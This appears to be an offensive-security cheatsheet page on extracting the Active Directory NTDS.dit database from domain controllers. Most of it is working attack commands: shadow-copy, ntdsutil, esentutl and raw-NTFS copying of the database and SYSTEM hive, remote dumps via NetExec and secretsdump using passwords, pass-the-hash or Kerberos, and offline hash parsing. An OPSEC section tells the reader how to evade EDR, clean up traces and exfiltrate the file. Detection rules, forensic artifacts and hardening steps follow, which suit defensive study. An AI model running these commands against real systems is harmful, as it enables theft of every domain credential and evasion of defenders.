daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-39-ntds-dit-extraction-and-dumping.md (27436B)


      1 ---
      2 title: "Attack #39 β€” NTDS.dit Extraction and Dumping"
      3 description: "The NTDS.dit file is the Active Directory database stored on every Domain Controller at C:\\Windows\\NTDS\\ntds.dit. It contains all domain credentials (NT…"
      4 category: active-directory
      5 subcategory: "Domain Controller Attacks"
      6 tags: ["active-directory", "kerberos", "credential-access", "hashing"]
      7 tools: ["NetExec", "Impacket", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/πŸ”΅ Attack #39 β€” NTDS.dit Extraction and Dumping.md"
     11 ---
     12 # πŸ”΅ Attack #39 β€” NTDS.dit Extraction & Dumping
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 The `NTDS.dit` file is the **Active Directory database** stored on every Domain Controller at `C:\Windows\NTDS\ntds.dit`. It contains all domain credentials (NT hashes, Kerberos keys, password history) for every account. Unlike DCSync (Attack #37, network-based), NTDS.dit extraction requires **local access to a DC** and involves copying the database file along with the SYSTEM registry hive for decryption.
     19 
     20 > [!info]+ Technical Deep-Dive β€” NTDS.dit Database Internals
     21 > 1. NTDS.dit uses the **Extensible Storage Engine (ESE / JET Blue)** database format β€” the same engine used by Exchange and Windows Search
     22 > 2. The database contains multiple tables, but the critical one is the **`datatable`** β€” it stores all AD objects and their attributes, including the `unicodePwd` (NT hash), `supplementalCredentials` (Kerberos keys, WDigest, cleartext if reversible encryption is enabled), and `lmPwdHistory`/`ntPwdHistory` (password history)
     23 > 3. **Encryption layers**: Credential attributes are encrypted with the **Password Encryption Key (PEK)**, which itself is encrypted with the **Boot Key (SYSKEY)** derived from the SYSTEM registry hive (`HKLM\SYSTEM\CurrentControlSet\Control\Lsa\{JD,Skew1,GBG,Data}`)
     24 > 4. **Decryption flow**: Extract SYSTEM hive β†’ derive Boot Key β†’ decrypt PEK from NTDS.dit header β†’ use PEK to decrypt individual credential attributes
     25 > 5. *The file is locked by the NTDS service while the DC is running β€” you cannot simply copy it; you must use Volume Shadow Copy, ntdsutil IFM, or other bypass methods*
     26 > 6. The database also contains the `link_table` (group memberships), `sd_table` (security descriptors), and `msysobjects` (schema definitions)
     27 
     28 ***
     29 
     30 ## βš™οΈ Prerequisites
     31 
     32 | Requirement | Detail |
     33 |---|---|
     34 | **Local admin / SYSTEM on DC** | Required for VSS/ntdsutil/esentutl methods |
     35 | **Or domain admin credentials** | For remote extraction methods (secretsdump, NetExec) |
     36 | **SYSTEM registry hive** | Required for offline decryption β€” contains the Boot Key |
     37 
     38 ***
     39 
     40 ## πŸ› οΈ Tools
     41 
     42 | Tool | Platform | Version | Notes |
     43 |---|---|---|---|
     44 | **vssadmin** | Windows (built-in) | All versions | Volume Shadow Copy β€” most common local extraction method |
     45 | **ntdsutil** | Windows (built-in) | All versions | Install From Media (IFM) β€” creates backup containing NTDS.dit + SYSTEM hive |
     46 | [diskshadow](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) | Windows (built-in) | Server 2008+ | Scriptable VSS alternative β€” useful for non-interactive shells |
     47 | **esentutl** | Windows (built-in) | All versions | ESE database utility β€” can copy locked files |
     48 | **wmic** | Windows (built-in) | Pre-2025 | `shadowcopy create` β€” another VSS trigger method |
     49 | [Impacket β€” secretsdump.py](https://github.com/fortra/impacket) | Linux | β‰₯ 0.10.0 | Remote NTDS dump via DRSUAPI or VSS |
     50 | [NetExec](https://github.com/Pennyw0rth/NetExec) | Linux | β‰₯ 1.1.0 | `--ntds vss` or `--ntds drsuapi` β€” remote one-liner |
     51 | [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) | Windows/PowerShell | β‰₯ 4.7 | `Get-ADDBAccount` β€” offline NTDS.dit parsing in PowerShell |
     52 | [NTDSDumpEx](https://github.com/zcgonvh/NTDSDumpEx) | Windows | Latest | Lightweight C# NTDS.dit parser |
     53 | [Invoke-NinjaCopy](https://github.com/PowerShellMafia/PowerSploit) | Windows/PowerShell | PowerSploit 3.0 | Copies locked files by reading raw NTFS volume β€” bypasses file locks |
     54 
     55 ***
     56 
     57 ## ⏱️ Time-to-Execute Estimates
     58 
     59 | Operation | Time | Notes |
     60 |---|---|---|
     61 | VSS shadow copy creation | **10–60 seconds** | Depends on drive size |
     62 | ntdsutil IFM backup | **30–120 seconds** | Creates full backup directory |
     63 | File copy from shadow copy | **5–30 seconds** | Depends on NTDS.dit file size (100MB to 10GB+) |
     64 | Remote dump via secretsdump | **1–30 minutes** | Depends on domain size and network speed |
     65 | Offline parsing with secretsdump | **30–300 seconds** | CPU-bound; depends on number of accounts |
     66 
     67 ***
     68 
     69 ## πŸ’» Full Commands
     70 
     71 ### πŸ”΄ Volume Shadow Copy (Most Common Method)
     72 
     73 ```powershell
     74 # ── Create shadow copy of C: ──────────────────────────────────────────────────
     75 vssadmin create shadow /for=C:
     76 # Note the Shadow Copy Volume Name (e.g., \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1)
     77 
     78 # ── Copy NTDS.dit from shadow copy ───────────────────────────────────────────
     79 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
     80 
     81 # ── Copy SYSTEM hive (needed for decryption) ─────────────────────────────────
     82 reg save HKLM\SYSTEM C:\Temp\SYSTEM
     83 
     84 # ── Cleanup β€” delete shadow copy ─────────────────────────────────────────────
     85 vssadmin delete shadows /shadow={shadow-id} /quiet
     86 ```
     87 
     88 ### πŸ”΄ ntdsutil (Built-in Microsoft Tool)
     89 
     90 ```powershell
     91 # ── Create IFM backup (contains NTDS.dit + registry) ─────────────────────────
     92 ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\ntds_backup" quit quit
     93 # NTDS.dit β†’ C:\Temp\ntds_backup\Active Directory\ntds.dit
     94 # SYSTEM β†’ C:\Temp\ntds_backup\registry\SYSTEM
     95 ```
     96 
     97 ### πŸ”΄ diskshadow (Scriptable VSS β€” Good for Non-Interactive Shells)
     98 
     99 ```powershell
    100 # ── Create diskshadow script ─────────────────────────────────────────────────
    101 # Write to C:\Temp\shadow.txt:
    102 # set context persistent nowriters
    103 # add volume c: alias mydrive
    104 # create
    105 # expose %mydrive% z:
    106 # exit
    107 
    108 # ── Execute the script ───────────────────────────────────────────────────────
    109 diskshadow /s C:\Temp\shadow.txt
    110 
    111 # ── Copy NTDS.dit from the exposed shadow ─────────────────────────────────────
    112 copy z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
    113 reg save HKLM\SYSTEM C:\Temp\SYSTEM
    114 
    115 # ── Cleanup ───────────────────────────────────────────────────────────────────
    116 diskshadow
    117 > delete shadows volume c:
    118 > exit
    119 ```
    120 
    121 > [!tip]+ Why diskshadow over vssadmin?
    122 > `fas:Lightbulb`
    123 > 1. **diskshadow** supports scripted (non-interactive) mode via `/s` flag β€” useful for reverse shells and C2 where interactive input isn't possible
    124 > 2. It can **expose** the shadow copy as a drive letter (e.g., `z:`) β€” simpler file copy syntax
    125 > 3. Some EDR tools specifically monitor for `vssadmin.exe` but miss `diskshadow.exe` β€” slightly stealthier
    126 > 4. *Available on Server 2008+ β€” not available on Windows client OS (Win 10/11)*
    127 
    128 ### πŸ”΄ esentutl (ESE Database Copy β€” Bypasses File Lock)
    129 
    130 ```powershell
    131 # ── Copy locked NTDS.dit using esentutl ───────────────────────────────────────
    132 esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d C:\Temp\ntds.dit
    133 # Uses VSS internally to copy the locked database file
    134 
    135 # ── Also copy SYSTEM hive ─────────────────────────────────────────────────────
    136 reg save HKLM\SYSTEM C:\Temp\SYSTEM
    137 ```
    138 
    139 ### πŸ”΄ wmic Shadow Copy
    140 
    141 ```powershell
    142 # ── Create shadow copy via wmic ───────────────────────────────────────────────
    143 wmic shadowcopy call create Volume='C:\'
    144 # Note: wmic is deprecated in Server 2025+; use PowerShell CIM instead
    145 
    146 # ── PowerShell CIM alternative ────────────────────────────────────────────────
    147 (Get-WmiObject -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
    148 ```
    149 
    150 ### πŸ”΄ Invoke-NinjaCopy (PowerSploit β€” Raw NTFS Read)
    151 
    152 ```powershell
    153 # ── Copy locked NTDS.dit by reading raw NTFS volume ──────────────────────────
    154 Import-Module .\PowerSploit\Exfiltration\Invoke-NinjaCopy.ps1
    155 Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\Temp\ntds.dit"
    156 # Reads the file by parsing the raw NTFS MFT β€” bypasses file locks entirely
    157 # ⚠️ Requires admin privileges and may trigger EDR (raw disk access)
    158 ```
    159 
    160 ### πŸ”΄ NetExec / CrackMapExec (Remote β€” from Linux)
    161 
    162 ```bash
    163 # ── Dump NTDS remotely via VSS ────────────────────────────────────────────────
    164 nxc smb DC01.corp.local -u Administrator -p 'Password1' --ntds vss
    165 
    166 # ── Via DRSUAPI (DCSync method, not file-based) ──────────────────────────────
    167 nxc smb DC01.corp.local -u Administrator -p 'Password1' --ntds drsuapi
    168 
    169 # ── With Pass-the-Hash ────────────────────────────────────────────────────────
    170 nxc smb DC01.corp.local -u Administrator -H 2b576acbe6bcfda7294d6bd18041b8fe --ntds vss
    171 
    172 # ── With Kerberos ─────────────────────────────────────────────────────────────
    173 export KRB5CCNAME=administrator.ccache
    174 nxc smb DC01.corp.local -u Administrator -k --ntds drsuapi
    175 ```
    176 
    177 ### πŸ”΄ Impacket β€” secretsdump.py (Remote)
    178 
    179 ```bash
    180 # ── Full dump with NTDS extraction ────────────────────────────────────────────
    181 secretsdump.py corp.local/Administrator:'Password1'@DC01.corp.local \
    182   -just-dc -outputfile domain_dump
    183 
    184 # ── Using PtH ────────────────────────────────────────────────────────────────
    185 secretsdump.py corp.local/Administrator@DC01.corp.local \
    186   -hashes :2b576acbe6bcfda7294d6bd18041b8fe -just-dc -outputfile dump
    187 
    188 # ── Kerberos authentication ───────────────────────────────────────────────────
    189 export KRB5CCNAME=administrator.ccache
    190 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local \
    191   -just-dc -outputfile dump
    192 ```
    193 
    194 ### πŸ”΄ Offline Parsing (After Extraction)
    195 
    196 ```bash
    197 # ── Parse NTDS.dit offline with secretsdump ───────────────────────────────────
    198 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile parsed_hashes
    199 # Outputs: parsed_hashes.ntds, parsed_hashes.ntds.kerberos, parsed_hashes.ntds.cleartext
    200 
    201 # ── Extract only NT hashes ────────────────────────────────────────────────────
    202 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -just-dc-ntlm -outputfile nt_only
    203 
    204 # ── With password history ─────────────────────────────────────────────────────
    205 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -history -outputfile with_history
    206 ```
    207 
    208 ```powershell
    209 # ── DSInternals (PowerShell β€” offline parsing) ────────────────────────────────
    210 Import-Module DSInternals
    211 $bootKey = Get-BootKey -SystemHiveFilePath C:\Temp\SYSTEM
    212 Get-ADDBAccount -All -DBPath C:\Temp\ntds.dit -BootKey $bootKey |
    213   Select-Object SamAccountName, @{N='NTHash';E={$_.NTHash | ConvertTo-Hex}} |
    214   Export-Csv domain_hashes.csv -NoTypeInformation
    215 
    216 # ── Extract specific user ─────────────────────────────────────────────────────
    217 Get-ADDBAccount -SamAccountName krbtgt -DBPath C:\Temp\ntds.dit -BootKey $bootKey
    218 ```
    219 
    220 ```bash
    221 # ── NTDSDumpEx (lightweight C# parser) ────────────────────────────────────────
    222 NTDSDumpEx.exe -d ntds.dit -s SYSTEM -o hashes.txt
    223 ```
    224 
    225 ***
    226 
    227 ## 🎯 OPSEC Tips
    228 
    229 1. **DCSync (Attack #37) is almost always preferred** β€” no file access on the DC, no disk artifacts, and can target individual users; use NTDS.dit extraction only when DCSync is blocked (network segmentation, firewall rules)
    230 2. **VSS shadow copies leave obvious forensic artifacts** β€” Event 8222, vssadmin process creation, shadow copy metadata; all are easily detected
    231 3. **diskshadow is slightly stealthier than vssadmin** β€” fewer EDR rules specifically target it, and it supports scripted mode for non-interactive access
    232 4. **Clean up shadow copies immediately** β€” leaving them behind is a dead giveaway; use `vssadmin delete shadows /all /quiet`
    233 5. **Exfiltrate the NTDS.dit file off the DC before parsing** β€” parsing on the DC is slow and leaves a long forensic window; copy to attacker machine and parse offline
    234 6. **NTDS.dit files can be enormous** (1–10+ GB in large environments) β€” consider compression before exfiltration: `Compress-Archive -Path C:\Temp\ntds.dit -DestinationPath C:\Temp\ntds.zip`
    235 7. **ntdsutil IFM creates a directory, not a single file** β€” don't forget to clean up the entire directory after extraction
    236 
    237 ### πŸ“Š OpSec Ranking
    238 
    239 | Method | Stealth | Speed | Reliability | Notes |
    240 |---|---|---|---|---|
    241 | DCSync (remote, not file-based) | 🟒 High | 🟒 Fast | 🟒 High | Preferred β€” no DC file access needed (Attack #37) |
    242 | secretsdump.py (remote) | 🟑 Medium | 🟑 Medium | 🟒 High | Creates temp service + VSS on DC remotely |
    243 | diskshadow (local) | 🟑 Medium | 🟑 Medium | 🟒 High | Less monitored than vssadmin |
    244 | vssadmin (local) | πŸ”΄ Low | 🟑 Medium | 🟒 High | Most commonly detected; EDR rules everywhere |
    245 | ntdsutil IFM (local) | πŸ”΄ Low | 🟑 Medium | 🟒 High | ntdsutil.exe execution is highly suspicious on DCs |
    246 | esentutl (local) | 🟑 Medium | 🟑 Medium | 🟑 Medium | Fewer EDR detections but still logs process creation |
    247 | Invoke-NinjaCopy (local) | 🟑 Medium | πŸ”΄ Slow | 🟑 Medium | Raw NTFS access may crash on very large databases |
    248 
    249 ***
    250 
    251 ## πŸ›‘οΈ Detection β€” Event IDs
    252 
    253 | Event ID | Source | What to Look For |
    254 |---|---|---|
    255 | **8222** | Security Log (DC) | Shadow copy created β€” definitive VSS indicator |
    256 | **4688** | Security Log (DC) | Process creation: `vssadmin.exe`, `ntdsutil.exe`, `diskshadow.exe`, `esentutl.exe` |
    257 | **Sysmon 1** | Sysmon | Process creation with full command line β€” look for `ntds.dit`, `ifm`, `shadow` keywords |
    258 | **Sysmon 11** | Sysmon | File creation of ntds.dit copy in unusual directory (not `C:\Windows\NTDS\`) |
    259 | **7045** | System Log | Service installed (secretsdump creates a temp RemComSvc service for remote execution) |
    260 | **4663** | Security Log | File access to `C:\Windows\NTDS\ntds.dit` (requires Object Access auditing configured) |
    261 | **1102** | Security Log | Audit log cleared β€” attacker may attempt to cover tracks after extraction |
    262 
    263 ### πŸ”Ž Sigma Rules
    264 
    265 ```yaml
    266 # ── SigmaHQ β€” NTDS.dit Access via VSS ───────────────────────────────────────
    267 title: NTDS.dit Access via Volume Shadow Copy
    268 id: c5c50bfa-5f39-497f-b862-41c3a9e455bc
    269 status: stable
    270 logsource:
    271   product: windows
    272   category: process_creation
    273 detection:
    274   selection_vss:
    275     Image|endswith:
    276       - '\vssadmin.exe'
    277       - '\diskshadow.exe'
    278     CommandLine|contains:
    279       - 'create shadow'
    280       - 'create'
    281   selection_ntdsutil:
    282     Image|endswith: '\ntdsutil.exe'
    283     CommandLine|contains: 'ifm'
    284   condition: selection_vss or selection_ntdsutil
    285 level: critical
    286 tags:
    287   - attack.credential_access
    288   - attack.t1003.003
    289 ```
    290 
    291 ```yaml
    292 # ── SigmaHQ β€” NTDS.dit File Copy ─────────────────────────────────────────────
    293 title: Suspicious NTDS.dit File Access
    294 id: 8bc64091-6875-4881-aaf1-f1c1bd6469cd
    295 logsource:
    296   product: windows
    297   category: file_event
    298 detection:
    299   selection:
    300     TargetFilename|contains: 'ntds.dit'
    301     TargetFilename|endswith: '.dit'
    302   filter_legitimate:
    303     TargetFilename|startswith: 'C:\Windows\NTDS\'
    304   condition: selection and not filter_legitimate
    305 level: critical
    306 ```
    307 
    308 ### πŸ›‘οΈ EDR-Specific Detections
    309 
    310 > [!warning]+ Microsoft Defender for Identity (MDI)
    311 > 1. **"Suspected NTDS.dit theft"** β€” detects ntdsutil IFM creation and VSS-based NTDS.dit access patterns
    312 > 2. MDI correlates process creation on DCs with known NTDS.dit extraction command patterns
    313 > 3. *MDI is less effective for NTDS.dit extraction than for DCSync because the extraction happens locally, not over the network*
    314 
    315 > [!warning]+ CrowdStrike Falcon
    316 > 1. **"NTDS.dit Credential Dumping"** β€” behavioral detection for VSS creation followed by ntds.dit file access
    317 > 2. **"Volume Shadow Copy Abuse"** β€” flags vssadmin/diskshadow when combined with file access to sensitive paths
    318 > 3. Process tree analysis detects `cmd.exe β†’ vssadmin.exe β†’ copy ntds.dit` chains
    319 
    320 > [!warning]+ Elastic Security
    321 > 1. Rule: **"NTDS or SAM Database File Copied"** β€” file event monitoring for ntds.dit copies outside the NTDS directory
    322 > 2. Rule: **"Volume Shadow Copy Creation"** β€” process creation monitoring for vssadmin/diskshadow with shadow creation arguments
    323 > 3. Rule: **"Credential Dumping via NTDSutil"** β€” specific ntdsutil IFM command detection
    324 
    325 ***
    326 
    327 ## πŸ”¬ Forensic Artifacts
    328 
    329 | Artifact | Location | Details |
    330 |---|---|---|
    331 | **Shadow copy metadata** | VSS storage (`System Volume Information`) | Shadow copy creation/deletion timestamps; may persist even after deletion |
    332 | **Event 8222** | DC Security Log | Shadow copy creation event with timestamp and volume information |
    333 | **Process execution** | Event 4688 / Sysmon 1 | vssadmin.exe, ntdsutil.exe, diskshadow.exe, esentutl.exe with full command lines |
    334 | **File creation** | Sysmon 11 | ntds.dit file created in non-standard location (C:\Temp, C:\Users, etc.) |
    335 | **IFM directory** | Disk forensics | `ntds_backup\Active Directory\ntds.dit` + `ntds_backup\registry\SYSTEM` directory structure |
    336 | **Temp service** | Event 7045 / System Log | secretsdump.py creates RemComSvc service for remote execution; service name and binary path logged |
    337 | **Prefetch** | `C:\Windows\Prefetch\` | `VSSADMIN.EXE-*.pf`, `NTDSUTIL.EXE-*.pf` β€” execution timestamps survive tool cleanup |
    338 | **USN Journal** | NTFS `$UsnJrnl:$J` | File creation/deletion entries for ntds.dit copies |
    339 
    340 ***
    341 
    342 > [!important]+ Windows Server Version Differences
    343 > 1. **Server 2012 R2**: All extraction methods work; minimal built-in detection
    344 > 2. **Server 2016**: vssadmin event logging improved; Sysmon recommended for file-level monitoring
    345 > 3. **Server 2019**: Credential Guard protects LSASS but does **NOT** protect NTDS.dit file extraction β€” the file is a separate attack surface
    346 > 4. **Server 2022**: No new NTDS.dit protection mechanisms; Microsoft recommends MDI + EDR on DCs
    347 > 5. **Server 2025**: `wmic.exe` is deprecated/removed β€” use PowerShell CIM cmdlets instead for shadow copy creation; all other methods still work
    348 > 6. *Microsoft's strategic direction is to move credentials out of NTDS.dit entirely (e.g., cloud-only identities with Entra ID), but hybrid AD environments will have NTDS.dit for the foreseeable future*
    349 
    350 ***
    351 
    352 ## πŸ”’ Hardening & Prevention
    353 
    354 ```powershell
    355 # ── 1. Monitor VSS shadow copy creation on DCs ───────────────────────────────
    356 # GPO β†’ Computer Configuration β†’ Windows Settings β†’ Security Settings β†’
    357 # Advanced Audit Policy β†’ Object Access β†’ Audit Other Object Access Events
    358 # This generates Event 4663 for sensitive file access
    359 
    360 # ── 2. Application whitelisting on DCs ────────────────────────────────────────
    361 # Use AppLocker or WDAC to restrict what can run on DCs:
    362 # Block: vssadmin.exe from non-admin contexts
    363 # Block: ntdsutil.exe from non-admin scheduled tasks
    364 # Block: PowerShell constrained language mode for non-admins
    365 
    366 # ── 3. Monitor file access to NTDS.dit ───────────────────────────────────────
    367 # Configure SACL on C:\Windows\NTDS\ntds.dit:
    368 $acl = Get-Acl "C:\Windows\NTDS\ntds.dit"
    369 $rule = New-Object System.Security.AccessControl.FileSystemAuditRule(
    370   "Everyone", "Read", "Success"
    371 )
    372 $acl.AddAuditRule($rule)
    373 Set-Acl "C:\Windows\NTDS\ntds.dit" $acl
    374 # ⚠️ Will generate events for legitimate NTDS operations too β€” tune carefully
    375 
    376 # ── 4. Enable command-line logging in process creation events ─────────────────
    377 # GPO β†’ Computer Configuration β†’ Admin Templates β†’ System β†’ Audit Process Creation
    378 # βœ… Include command line in process creation events
    379 # This makes Event 4688 include the full command line
    380 
    381 # ── 5. Deploy Sysmon on all DCs ──────────────────────────────────────────────
    382 # Sysmon config for NTDS.dit monitoring:
    383 # <FileCreate onmatch="include">
    384 #   <TargetFilename condition="contains">ntds.dit</TargetFilename>
    385 # </FileCreate>
    386 # <ProcessCreate onmatch="include">
    387 #   <Image condition="end with">vssadmin.exe</Image>
    388 #   <Image condition="end with">ntdsutil.exe</Image>
    389 #   <Image condition="end with">diskshadow.exe</Image>
    390 # </ProcessCreate>
    391 
    392 # ── 6. Restrict remote access to DCs ─────────────────────────────────────────
    393 # Implement Tiered Administration:
    394 # Only Tier 0 admin accounts should have interactive/remote logon rights on DCs
    395 # Deny logon locally/RDP for standard domain admins on DCs
    396 # Block SMB access to DCs from workstation VLANs (where possible)
    397 
    398 # ── 7. EDR on Domain Controllers ─────────────────────────────────────────────
    399 # Deploy EDR agent (Defender for Endpoint, CrowdStrike, etc.) on ALL DCs
    400 # Configure real-time monitoring for credential theft patterns
    401 ```
    402 
    403 ***
    404 
    405 ## 🧩 Troubleshooting
    406 
    407 | Error | Cause | Fix |
    408 |---|---|---|
    409 | `vssadmin: Error: Access is denied` | Not running as admin / SYSTEM on the DC | Elevate to local admin; use `psexec -s cmd` for SYSTEM context |
    410 | `secretsdump: STATUS_ACCESS_DENIED` | Account doesn't have admin rights on DC | Verify DA membership; try `-hashes` for PtH or `-k` for Kerberos auth |
    411 | `ERROR_SHARING_VIOLATION` when copying ntds.dit | Trying to copy the live file without VSS | Use VSS shadow copy, ntdsutil IFM, or esentutl `/y /vss` β€” cannot copy the live file directly |
    412 | secretsdump returns `Cannot open NTDS.dit` | Incorrect file path or corrupted database | Verify file path; if parsing offline, ensure both `ntds.dit` and `SYSTEM` files are from the same DC |
    413 | Offline parsing returns garbage / wrong hashes | SYSTEM hive doesn't match the NTDS.dit | The SYSTEM hive must be from the SAME DC as the NTDS.dit β€” different DCs have different Boot Keys |
    414 | ntdsutil IFM fails with `error 0xc00002e1` | NTDS service not running or database inconsistent | Run `ntdsutil β†’ files β†’ integrity` first; the service must be running for IFM creation |
    415 | Shadow copy creation hangs | Low disk space or VSS writer failure | Check `vssadmin list writers` for failed writers; ensure at least 10% free disk space on the volume |
    416 | NetExec `--ntds vss` returns timeout | Large NTDS.dit file + slow network | Increase timeout with `--timeout 300`; or extract locally and parse offline |
    417 
    418 ***
    419 
    420 ## πŸ—ΊοΈ MITRE ATT&CK
    421 
    422 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups |
    423 |---|---|---|---|---|
    424 | **Credential Access** | [T1003](https://attack.mitre.org/techniques/T1003/) | [.003 β€” NTDS](https://attack.mitre.org/techniques/T1003/003/) | Extract NTDS.dit via VSS/ntdsutil/diskshadow and parse offline for all domain credentials | [APT28](https://attack.mitre.org/groups/G0007/) (Fancy Bear), [FIN6](https://attack.mitre.org/groups/G0037/), [Wizard Spider](https://attack.mitre.org/groups/G0102/) |
    425 | **Collection** | [T1005](https://attack.mitre.org/techniques/T1005/) | Data from Local System | Copy NTDS.dit and SYSTEM hive files from the DC filesystem | Commonly used by ransomware operators |
    426 | **Defense Evasion** | [T1006](https://attack.mitre.org/techniques/T1006/) | Direct Volume Access | Use Invoke-NinjaCopy to read raw NTFS volume bypassing file locks | Advanced red team operations |
    427 
    428 > [!tip]+ Real-World APT Usage
    429 > `fas:Lightbulb`
    430 > 1. **APT28 (Fancy Bear)** β€” Used ntdsutil IFM extraction after gaining DC access in government network compromises
    431 > 2. **Wizard Spider (Ryuk/Conti)** β€” Frequently used `vssadmin create shadow` + NTDS.dit extraction as part of their domain compromise playbook before deploying ransomware
    432 > 3. **FIN6** β€” Extracted NTDS.dit for offline credential cracking to access payment processing systems
    433 > 4. *NTDS.dit extraction is considered "noisier" than DCSync but is still widely used when network-level replication is blocked*
    434 
    435 ***
    436 
    437 ## πŸ”— Attack Chain Context
    438 
    439 ```
    440 [NTDS.dit] ──→ Direct Database Extraction β†’ All Domain Credentials
    441          β”‚
    442          β”œβ”€β”€β†’ πŸ†š DCSync (Attack #37) is preferred β€” no DC file access needed
    443          β”œβ”€β”€β†’ πŸ”— Useful when: network segmentation blocks DCSync RPC
    444          β”œβ”€β”€β†’ πŸ”‘ Extract KRBTGT hash β†’ Golden Ticket (Attack #11)
    445          β”œβ”€β”€β†’ πŸ’» Extract all NT hashes β†’ Pass-the-Hash (Attack #4)
    446          β”œβ”€β”€β†’ πŸ”“ Offline cracking of all domain passwords
    447          β”œβ”€β”€β†’ πŸ“‹ Requires: local admin / SYSTEM on DC, or remote admin via secretsdump
    448          └──→ πŸ’€ Defeated by: monitor shadow copy creation, EDR on DCs, Sysmon file monitoring
    449 ```
    450 
    451 ***
    452 
    453 > βœ… **Attack #39 β€” NTDS.dit Extraction complete.**